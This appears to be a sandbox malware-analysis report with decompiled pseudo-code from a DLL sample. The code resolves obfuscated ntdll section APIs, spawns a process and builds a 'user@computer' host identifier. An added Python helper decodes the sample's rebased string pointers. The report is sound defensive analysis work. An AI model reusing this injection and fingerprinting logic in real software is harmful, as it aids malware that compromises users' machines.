                                                    • Part of subcall function 04B31199: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 04B3124B
                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04B3A4AE
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04B3A4BD
                                                  • HeapFree.KERNEL32(00000000,00000000,?,06AF95B0), ref: 04B3A4CC
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04B3A4DE
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04B3A4ED
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                  • String ID:
                                                  • API String ID: 3080378247-0
                                                  • Opcode ID: 6bae05e5f369d6c2a3bf58b838edfae9b1565f1b44ba5d9aa9863d6bc808ba7e
                                                  • Instruction ID: a8fe6ad948a1b5b5574da2e036ba54c9a7c2bac9f48a38d14576f856421e3fe6
                                                  • Opcode Fuzzy Hash: 6bae05e5f369d6c2a3bf58b838edfae9b1565f1b44ba5d9aa9863d6bc808ba7e
                                                  • Instruction Fuzzy Hash: 28619872500204AFEB21DBBAEC88F5E7BECEB48702F154016F948E7250DA39EC159B75
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 27%
                                                  			E04B3816C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				long _v16;
                                                  				intOrPtr _v20;
                                                  				signed int _v24;
                                                  				void* __esi;
                                                  				long _t43;
                                                  				intOrPtr _t44;
                                                  				intOrPtr _t46;
                                                  				void* _t48;
                                                  				void* _t49;
                                                  				void* _t50;
                                                  				intOrPtr _t54;
                                                  				intOrPtr _t57;
                                                  				void* _t58;
                                                  				void* _t59;
                                                  				void* _t60;
                                                  				intOrPtr _t66;
                                                  				void* _t71;
                                                  				void* _t74;
                                                  				intOrPtr _t75;
                                                  				void* _t77;
                                                  				intOrPtr _t79;
                                                  				intOrPtr* _t80;
                                                  				intOrPtr _t91;
                                                  
                                                  				_t79 =  *0x4b3d33c; // 0x6af9bc8
                                                  				_v24 = 8;
                                                  				_t43 = GetTickCount();
                                                  				_push(5);
                                                  				_t74 = 0xa;
                                                  				_v16 = _t43;
                                                  				_t44 = E04B370F5(_t74,  &_v16);
                                                  				_v8 = _t44;
                                                  				if(_t44 == 0) {
                                                  					_v8 = 0x4b3c1ac;
                                                  				}
                                                  				_t46 = E04B38022(_t79);
                                                  				_v12 = _t46;
                                                  				if(_t46 != 0) {
                                                  					_t80 = __imp__;
                                                  					_t48 =  *_t80(_v8, _t71);
                                                  					_t49 =  *_t80(_v12);
                                                  					_t50 =  *_t80(_a4);
                                                  					_t54 = E04B32049(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                  					_v20 = _t54;
                                                  					if(_t54 != 0) {
                                                  						_t75 =  *0x4b3d27c; // 0x1fba5a8
                                                  						_t16 = _t75 + 0x4b3eb28; // 0x530025
                                                  						 *0x4b3d11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                  						_push(4);
                                                  						_t77 = 5;
                                                  						_t57 = E04B370F5(_t77,  &_v16);
                                                  						_v8 = _t57;
                                                  						if(_t57 == 0) {
                                                  							_v8 = 0x4b3c1b0;
                                                  						}
                                                  						_t58 =  *_t80(_v8);
                                                  						_t59 =  *_t80(_v12);
                                                  						_t60 =  *_t80(_a4);
                                                  						_t91 = E04B32049(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                  						if(_t91 == 0) {
                                                  							E04B39039(_v20);
                                                  						} else {
                                                  							_t66 =  *0x4b3d27c; // 0x1fba5a8
                                                  							_t31 = _t66 + 0x4b3ec48; // 0x73006d
                                                  							 *0x4b3d11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                  							 *_a16 = _v20;
                                                  							_v24 = _v24 & 0x00000000;
                                                  							 *_a20 = _t91;
                                                  						}
                                                  					}
                                                  					E04B39039(_v12);
                                                  				}
                                                  				return _v24;
                                                  			}

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 04B38181
                                                  • lstrlen.KERNEL32(?,80000002,00000005), ref: 04B381C1
                                                  • lstrlen.KERNEL32(00000000), ref: 04B381CA
                                                  • lstrlen.KERNEL32(00000000), ref: 04B381D1
                                                  • lstrlenW.KERNEL32(80000002), ref: 04B381DE
                                                  • lstrlen.KERNEL32(?,00000004), ref: 04B3823E
                                                  • lstrlen.KERNEL32(?), ref: 04B38247
                                                  • lstrlen.KERNEL32(?), ref: 04B3824E
                                                  • lstrlenW.KERNEL32(?), ref: 04B38255
                                                    • Part of subcall function 04B39039: HeapFree.KERNEL32(00000000,00000000,04B37F18,00000000,?,?,00000000), ref: 04B39045
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CountFreeHeapTick
                                                  • String ID:
                                                  • API String ID: 2535036572-0
                                                  • Opcode ID: 0bac8fa206acd29043e7c748acbbb705fea2e221d57e9d88643c4d0b8e911f0c
                                                  • Instruction ID: 28a95bb4eac9b20240f99cc9187efb16f3782879045e5e24c909f6521efdbf2d
                                                  • Opcode Fuzzy Hash: 0bac8fa206acd29043e7c748acbbb705fea2e221d57e9d88643c4d0b8e911f0c
                                                  • Instruction Fuzzy Hash: 00414A76900118EFDF11AFE6CC05A9EBBB5EF48305F054091F904A7211DB39AE25EFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 73%
                                                  			E04B3205E(void* __eax, void* __ecx) {
                                                  				long _v8;
                                                  				char _v12;
                                                  				void* _v16;
                                                  				void* _v28;
                                                  				long _v32;
                                                  				void _v104;
                                                  				char _v108;
                                                  				long _t36;
                                                  				intOrPtr _t40;
                                                  				intOrPtr _t47;
                                                  				intOrPtr _t50;
                                                  				void* _t58;
                                                  				void* _t68;
                                                  				intOrPtr* _t70;
                                                  				intOrPtr* _t71;
                                                  
                                                  				_t1 = __eax + 0x14; // 0x74183966
                                                  				_t69 =  *_t1;
                                                  				_t36 = E04B3692C(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                  				_v8 = _t36;
                                                  				if(_t36 != 0) {
                                                  					L12:
                                                  					return _v8;
                                                  				}
                                                  				E04B3A8D8( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                  				_t40 = _v12(_v12);
                                                  				_v8 = _t40;
                                                  				if(_t40 == 0 && ( *0x4b3d260 & 0x00000001) != 0) {
                                                  					_v32 = 0;
                                                  					asm("stosd");
                                                  					asm("stosd");
                                                  					asm("stosd");
                                                  					_v108 = 0;
                                                  					memset( &_v104, 0, 0x40);
                                                  					_t47 =  *0x4b3d27c; // 0x1fba5a8
                                                  					_t18 = _t47 + 0x4b3e3e6; // 0x73797325
                                                  					_t68 = E04B395B1(_t18);
                                                  					if(_t68 == 0) {
                                                  						_v8 = 8;
                                                  					} else {
                                                  						_t50 =  *0x4b3d27c; // 0x1fba5a8
                                                  						_t19 = _t50 + 0x4b3e747; // 0x6af8cef
                                                  						_t20 = _t50 + 0x4b3e0af; // 0x4e52454b
                                                  						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                  						if(_t71 == 0) {
                                                  							_v8 = 0x7f;
                                                  						} else {
                                                  							_v108 = 0x44;
                                                  							E04B384D5();
                                                  							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                  							_push(1);
                                                  							E04B384D5();
                                                  							if(_t58 == 0) {
                                                  								_v8 = GetLastError();
                                                  							} else {
                                                  								CloseHandle(_v28);
                                                  								CloseHandle(_v32);
                                                  							}
                                                  						}
                                                  						HeapFree( *0x4b3d238, 0, _t68);
                                                  					}
                                                  				}
                                                  				_t70 = _v16;
                                                  				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                  				E04B39039(_t70);
                                                  				goto L12;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 04B3692C: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04B3207A,?,00000001,?,?,00000000,00000000), ref: 04B36951
                                                    • Part of subcall function 04B3692C: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04B36973
                                                    • Part of subcall function 04B3692C: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04B36989
                                                    • Part of subcall function 04B3692C: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04B3699F
                                                    • Part of subcall function 04B3692C: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04B369B5
                                                    • Part of subcall function 04B3692C: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04B369CB
                                                  • memset.NTDLL ref: 04B320C8
                                                    • Part of subcall function 04B395B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,04B323E9,63699BCE,04B31354,73797325), ref: 04B395C2
                                                    • Part of subcall function 04B395B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04B395DC
                                                  • GetModuleHandleA.KERNEL32(4E52454B,06AF8CEF,73797325), ref: 04B320FE
                                                  • GetProcAddress.KERNEL32(00000000), ref: 04B32105
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04B3216D
                                                    • Part of subcall function 04B384D5: GetProcAddress.KERNEL32(36776F57,04B321E5), ref: 04B384F0
                                                  • CloseHandle.KERNEL32(00000000,00000001), ref: 04B3214A
                                                  • CloseHandle.KERNEL32(?), ref: 04B3214F
                                                  • GetLastError.KERNEL32(00000001), ref: 04B32153
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                  • String ID:
                                                  • API String ID: 3075724336-0
                                                  • Opcode ID: 7ef243611c03f2de5e6f409f41a5719e1a9cc9f5abe8f51dd947df8a4d9e5dc8
                                                  • Instruction ID: 92e3bf9e616cb783f4e12208a6c0b1f61fe3ea69355d582af216c41453bac071
                                                  • Opcode Fuzzy Hash: 7ef243611c03f2de5e6f409f41a5719e1a9cc9f5abe8f51dd947df8a4d9e5dc8
                                                  • Instruction Fuzzy Hash: 453141B6D00208FFDB109FEADD84D9FBBBCEB08346F1144A6E605A7111D735AD498B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 63%
                                                  			E04B38307(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _t9;
                                                  				intOrPtr _t13;
                                                  				char* _t28;
                                                  				void* _t33;
                                                  				void* _t34;
                                                  				char* _t36;
                                                  				intOrPtr* _t40;
                                                  				char* _t41;
                                                  				char* _t42;
                                                  				char* _t43;
                                                  
                                                  				_t34 = __edx;
                                                  				_push(__ecx);
                                                  				_t9 =  *0x4b3d27c; // 0x1fba5a8
                                                  				_t1 = _t9 + 0x4b3e62c; // 0x253d7325
                                                  				_t36 = 0;
                                                  				_t28 = E04B39401(__ecx, _t1);
                                                  				if(_t28 != 0) {
                                                  					_t40 = __imp__;
                                                  					_t13 =  *_t40(_t28);
                                                  					_v8 = _t13;
                                                  					_t41 = E04B32049(_v8 +  *_t40(_a4) + 1);
                                                  					if(_t41 != 0) {
                                                  						strcpy(_t41, _t28);
                                                  						_pop(_t33);
                                                  						__imp__(_t41, _a4);
                                                  						_t36 = E04B37225(_t34, _t41, _a8);
                                                  						E04B39039(_t41);
                                                  						_t42 = E04B38E82(StrTrimA(_t36, "="), _t36);
                                                  						if(_t42 != 0) {
                                                  							E04B39039(_t36);
                                                  							_t36 = _t42;
                                                  						}
                                                  						_t43 = E04B3788B(_t36, _t33);
                                                  						if(_t43 != 0) {
                                                  							E04B39039(_t36);
                                                  							_t36 = _t43;
                                                  						}
                                                  					}
                                                  					E04B39039(_t28);
                                                  				}
                                                  				return _t36;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 04B39401: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,04B38321,253D7325,00000000,00000000,74ECC740,?,?,04B3A428,?), ref: 04B39468
                                                    • Part of subcall function 04B39401: sprintf.NTDLL ref: 04B39489
                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04B3A428,?,06AF95B0), ref: 04B38332
                                                  • lstrlen.KERNEL32(?,?,?,04B3A428,?,06AF95B0), ref: 04B3833A
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • strcpy.NTDLL ref: 04B38351
                                                  • lstrcat.KERNEL32(00000000,?), ref: 04B3835C
                                                    • Part of subcall function 04B37225: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04B3836B,00000000,?,?,?,04B3A428,?,06AF95B0), ref: 04B3723C
                                                    • Part of subcall function 04B39039: HeapFree.KERNEL32(00000000,00000000,04B37F18,00000000,?,?,00000000), ref: 04B39045
                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04B3A428,?,06AF95B0), ref: 04B38379
                                                    • Part of subcall function 04B38E82: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04B38385,00000000,?,?,04B3A428,?,06AF95B0), ref: 04B38E8C
                                                    • Part of subcall function 04B38E82: _snprintf.NTDLL ref: 04B38EEA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                  • String ID: =
                                                  • API String ID: 2864389247-1428090586
                                                  • Opcode ID: 661da905d710d6cf67ab9e10ec23340a060c33c4c4bc3f5a80263c70a66cd8ec
                                                  • Instruction ID: ac5133ab42de2ebc1d2c91afb1fa1490cd6c7d7d146485b8879a7a78546dc936
                                                  • Opcode Fuzzy Hash: 661da905d710d6cf67ab9e10ec23340a060c33c4c4bc3f5a80263c70a66cd8ec
                                                  • Instruction Fuzzy Hash: 83110673901224BB5B227BF7AC84C6F3AADDF8465B7054096F504A7200CE79FD0257E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SysAllocString.OLEAUT32(00000000), ref: 04B36D1F
                                                  • SysAllocString.OLEAUT32(0070006F), ref: 04B36D33
                                                  • SysAllocString.OLEAUT32(00000000), ref: 04B36D45
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04B36DA9
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04B36DB8
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04B36DC3
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: b556888951cfa645474de61e5523970bb024dc7df7191f4b588a2c59c0f51602
                                                  • Instruction ID: 94ec17db9b34bfe70164c7c0d0708739e0c6a9495e1f459951632dd2b80deae0
                                                  • Opcode Fuzzy Hash: b556888951cfa645474de61e5523970bb024dc7df7191f4b588a2c59c0f51602
                                                  • Instruction Fuzzy Hash: C8314E32D00609ABDF11DFBDC844A9EBBB6EF49305F144465E911EB120DB75AD0ACB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E04B3692C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _t23;
                                                  				intOrPtr _t26;
                                                  				_Unknown_base(*)()* _t28;
                                                  				intOrPtr _t30;
                                                  				_Unknown_base(*)()* _t32;
                                                  				intOrPtr _t33;
                                                  				_Unknown_base(*)()* _t35;
                                                  				intOrPtr _t36;
                                                  				_Unknown_base(*)()* _t38;
                                                  				intOrPtr _t39;
                                                  				_Unknown_base(*)()* _t41;
                                                  				intOrPtr _t44;
                                                  				struct HINSTANCE__* _t48;
                                                  				intOrPtr _t54;
                                                  
                                                  				_t54 = E04B32049(0x20);
                                                  				if(_t54 == 0) {
                                                  					_v8 = 8;
                                                  				} else {
                                                  					_t23 =  *0x4b3d27c; // 0x1fba5a8
                                                  					_t1 = _t23 + 0x4b3e11a; // 0x4c44544e
                                                  					_t48 = GetModuleHandleA(_t1);
                                                  					_t26 =  *0x4b3d27c; // 0x1fba5a8
                                                  					_t2 = _t26 + 0x4b3e769; // 0x7243775a
                                                  					_v8 = 0x7f;
                                                  					_t28 = GetProcAddress(_t48, _t2);
                                                  					 *(_t54 + 0xc) = _t28;
                                                  					if(_t28 == 0) {
                                                  						L8:
                                                  						E04B39039(_t54);
                                                  					} else {
                                                  						_t30 =  *0x4b3d27c; // 0x1fba5a8
                                                  						_t5 = _t30 + 0x4b3e756; // 0x614d775a
                                                  						_t32 = GetProcAddress(_t48, _t5);
                                                  						 *(_t54 + 0x10) = _t32;
                                                  						if(_t32 == 0) {
                                                  							goto L8;
                                                  						} else {
                                                  							_t33 =  *0x4b3d27c; // 0x1fba5a8
                                                  							_t7 = _t33 + 0x4b3e40b; // 0x6e55775a
                                                  							_t35 = GetProcAddress(_t48, _t7);
                                                  							 *(_t54 + 0x14) = _t35;
                                                  							if(_t35 == 0) {
                                                  								goto L8;
                                                  							} else {
                                                  								_t36 =  *0x4b3d27c; // 0x1fba5a8
                                                  								_t9 = _t36 + 0x4b3e4d2; // 0x4e6c7452
                                                  								_t38 = GetProcAddress(_t48, _t9);
                                                  								 *(_t54 + 0x18) = _t38;
                                                  								if(_t38 == 0) {
                                                  									goto L8;
                                                  								} else {
                                                  									_t39 =  *0x4b3d27c; // 0x1fba5a8
                                                  									_t11 = _t39 + 0x4b3e779; // 0x6c43775a
                                                  									_t41 = GetProcAddress(_t48, _t11);
                                                  									 *(_t54 + 0x1c) = _t41;
                                                  									if(_t41 == 0) {
                                                  										goto L8;
                                                  									} else {
                                                  										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                  										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                  										_t44 = E04B3727B(_t54, _a8);
                                                  										_v8 = _t44;
                                                  										if(_t44 != 0) {
                                                  											goto L8;
                                                  										} else {
                                                  											 *_a12 = _t54;
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _v8;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04B3207A,?,00000001,?,?,00000000,00000000), ref: 04B36951
                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04B36973
                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04B36989
                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04B3699F
                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04B369B5
                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04B369CB
                                                    • Part of subcall function 04B3727B: memset.NTDLL ref: 04B372FA
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$AllocateHandleHeapModulememset
                                                  • String ID:
                                                  • API String ID: 1886625739-0
                                                  • Opcode ID: 915af75dd84168d8fe817d780856de78f175c0642ca846d9702686c554cec5c3
                                                  • Instruction ID: e80f167206ea8c1759d0ac17cfd2b10c737b3e1e094df53c3ae3968070c087f4
                                                  • Opcode Fuzzy Hash: 915af75dd84168d8fe817d780856de78f175c0642ca846d9702686c554cec5c3
                                                  • Instruction Fuzzy Hash: C2212DB560120AEFEB20DFBBDC44E5A77ECEB18346B02816AE645D7201E734E9058F70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
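The GetProcAddress chain above never passes a literal name: each argument is the global at 0x4b3d27c (0x1fba5a8 at dump time) added to a static address inside the module, and the decompiler annotates the four bytes found at the sum (0x614d775a, 0x6e55775a, ...). The same values appear in the API list, so the sandbox is printing the first DWORD of the pointed-to string, not the pointer. Decoding them little-endian gives "ZwMa", "ZwUn", "RtlN", "ZwCl", "ZwCr" and, for GetModuleHandleA, "NTDL". The added Python below (not code from the sample or from Joe Sandbox) reproduces the rebasing, checks that the rebased addresses fall outside the module's 0x4B30000..0x4B40000 dumps, and decodes the DWORDs. The reading of the global as a delta to a decrypted string copy is an inference from those facts; the demo memory image is constructed and holds only the four bytes the report shows, since the full names are not on the page.

```python
import struct

# Values copied from the report above: module image base ("Offset: 04B30000"),
# the range covered by the module dumps, and *0x4b3d27c at dump time.
MODULE_BASE = 0x04B30000
MODULE_END = 0x04B40000
DELTA = 0x01FBA5A8
# static string address used in the GetProcAddress chain -> DWORD annotated
# by the decompiler at the rebased address
REFS = {
    0x04B3E756: 0x614D775A,
    0x04B3E40B: 0x6E55775A,
    0x04B3E4D2: 0x4E6C7452,
    0x04B3E779: 0x6C43775A,
}


def dword_to_ascii(value: int) -> str:
    """Render a 32-bit value as the four little-endian bytes it was read from."""
    return struct.pack("<I", value & 0xFFFFFFFF).decode("latin-1")


def rebase(static_addr: int, delta: int = DELTA) -> int:
    """Reproduce `*0x4b3d27c + <static address>` with 32-bit wraparound."""
    return (static_addr + delta) & 0xFFFFFFFF


def in_module(addr: int) -> bool:
    return MODULE_BASE <= addr < MODULE_END


def read_cstring(mem: bytes, mem_base: int, addr: int, limit: int = 64) -> str:
    """Read a NUL-terminated string from a memory image that starts at mem_base."""
    off = addr - mem_base
    if not 0 <= off < len(mem):
        raise ValueError(f"{addr:#x} not inside image at {mem_base:#x}")
    end = mem.find(b"\0", off, off + limit)
    return mem[off:end if end != -1 else off + limit].decode("latin-1")


def resolve_refs(mem: bytes, mem_base: int, delta: int, static_addrs) -> dict:
    """Map each static string address to the string at its rebased location.
    Feed it a dump of the region the rebased addresses fall into."""
    return {a: read_cstring(mem, mem_base, rebase(a, delta)) for a in static_addrs}


def build_demo_image():
    """Constructed memory for the demo: only the four bytes the report shows,
    placed at each rebased address, with a NUL after them."""
    base = rebase(min(REFS)) & ~0xFFF
    img = bytearray(rebase(max(REFS)) - base + 0x100)
    for static_addr, dword in REFS.items():
        off = rebase(static_addr) - base
        img[off:off + 4] = struct.pack("<I", dword)
    return bytes(img), base


def check_report_consistency() -> dict:
    """Per reference: rebased address, whether it lies inside the module,
    the string read from the constructed image, and the decoded DWORD."""
    img, base = build_demo_image()
    strings = resolve_refs(img, base, DELTA, REFS)
    return {
        a: {
            "runtime": rebase(a),
            "in_module": in_module(rebase(a)),
            "string": strings[a],
            "dword_ascii": dword_to_ascii(dw),
        }
        for a, dw in REFS.items()
    }


if __name__ == "__main__":
    for a, row in check_report_consistency().items():
        print(f"{a:#010x} -> {row['runtime']:#010x} in_module={row['in_module']} "
              f"{row['string']!r} == {row['dword_ascii']!r}")
    print(dword_to_ascii(0x4C44544E), dword_to_ascii(0x7243775A))
```

Every rebased address lands around 0x6AF8xxx, well outside the module, which is why the static .data addresses alone never show the API names; with a dump of that heap region, `resolve_refs` returns the full strings.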

                                                  C-Code - Quality: 100%
                                                  			E04B37649() {
                                                  				long _v8;
                                                  				long _v12;
                                                  				int _v16;
                                                  				long _t39;
                                                  				long _t43;
                                                  				signed int _t47;
                                                  				signed int _t52;
                                                  				int _t56;
                                                  				int _t57;
                                                  				char* _t63;
                                                  				short* _t66;
                                                  
                                                  				_v16 = 0;
                                                  				_v8 = 0;
                                                  				GetUserNameW(0,  &_v8);
                                                  				_t39 = _v8;
                                                  				if(_t39 != 0) {
                                                  					_v12 = _t39;
                                                  					_v8 = 0;
                                                  					GetComputerNameW(0,  &_v8);
                                                  					_t43 = _v8;
                                                  					if(_t43 != 0) {
                                                  						_v12 = _v12 + _t43 + 2;
                                                  						_t63 = E04B32049(_v12 + _t43 + 2 << 2);
                                                  						if(_t63 != 0) {
                                                  							_t47 = _v12;
                                                  							_t66 = _t63 + _t47 * 2;
                                                  							_v8 = _t47;
                                                  							if(GetUserNameW(_t66,  &_v8) == 0) {
                                                  								L7:
                                                  								E04B39039(_t63);
                                                  							} else {
                                                  								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40; // '@' overwrites the username's terminating NUL
                                                  								_t52 = _v8;
                                                  								_v12 = _v12 - _t52;
                                                  								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
                                                  									goto L7;
                                                  								} else {
                                                  									_t56 = _v12 + _v8;
                                                  									_t31 = _t56 + 2; // 0x4b3a33a
                                                  									_v12 = _t56;
                                                  									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0); // 0xfde9 = CP_UTF8
                                                  									_v8 = _t57;
                                                  									if(_t57 == 0) {
                                                  										goto L7;
                                                  									} else {
                                                  										_t63[_t57] = 0;
                                                  										_v16 = _t63;
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _v16;
                                                  			}

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,04B3A338), ref: 04B3765D
                                                  • GetComputerNameW.KERNEL32(00000000,04B3A338), ref: 04B37679
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • GetUserNameW.ADVAPI32(00000000,04B3A338), ref: 04B376B3
                                                  • GetComputerNameW.KERNEL32(04B3A338,?), ref: 04B376D5
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04B3A338,00000000,04B3A33A,00000000,00000000,?,?,04B3A338), ref: 04B376F8
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
